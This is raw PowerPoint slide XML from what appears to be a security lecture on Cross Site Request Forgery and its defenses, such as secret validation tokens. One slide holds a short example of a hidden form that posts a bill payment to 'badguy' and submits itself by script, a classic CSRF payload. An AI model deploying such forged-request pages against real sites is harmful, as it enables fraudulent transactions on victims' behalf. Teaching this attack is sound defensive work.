        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4248150"/>
            <a:ext cx="1465263" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90123" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2763838" y="2070100"/>
            <a:ext cx="2068512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79884" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4572000"/>
            <a:ext cx="2906713" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90125" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2655888" y="2786063"/>
            <a:ext cx="2449512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79886"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90127" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3011488" y="4298950"/>
            <a:ext cx="3076575" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90128" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2197100" y="4702175"/>
            <a:ext cx="2932113" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90129" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="23018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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90130" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075" y="37338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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90131" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="1952625" y="41592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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79892" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2963863"/>
            <a:ext cx="2830513" cy="617537"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90133" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="31242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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90134" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6248400"/>
            <a:ext cx="5310188" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Q: how long do you stay logged on to Gmail?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="4022725" y="3097213"/>
            <a:ext cx="1212850" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)</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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="3200400"/>
            <a:ext cx="6705600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="2438400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="152400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Cross Site Request Forgery  (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96262" name="Rectangle 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1219200"/>
            <a:ext cx="7696200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User logs in to  bank.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Session cookie remains in browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits another site containing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form  name=F  action=http://bank.com/BillPay.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;input  name=recipient   value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.F.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(); &lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends user auth cookie with request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Transaction will be fulfilled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie auth is insufficient when side effects occur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26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626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262">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26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26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26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26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smtClean="0"/>
              <a:t>Form post with cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="Picture 12" descr="basic-csrf-black"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="412750" y="1462088"/>
            <a:ext cx="8350250" cy="5395912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="4267200"/>
            <a:ext cx="2590800" cy="2365375"/>
            <a:chOff x="4191000" y="4267200"/>
            <a:chExt cx="2590800" cy="2365375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="6232525"/>
              <a:ext cx="1992313" cy="400050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91439" tIns="45719" rIns="91439" bIns="45719">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>User credentials</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4479925" y="4267200"/>
              <a:ext cx="2301875" cy="4794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defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4618038" y="5218112"/>
              <a:ext cx="1485900" cy="542925"/>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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4675188" y="4403725"/>
            <a:ext cx="2122487" cy="236538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82296" tIns="41148" rIns="82296" bIns="41148">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=523FA4cd2E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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Secret Validation Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
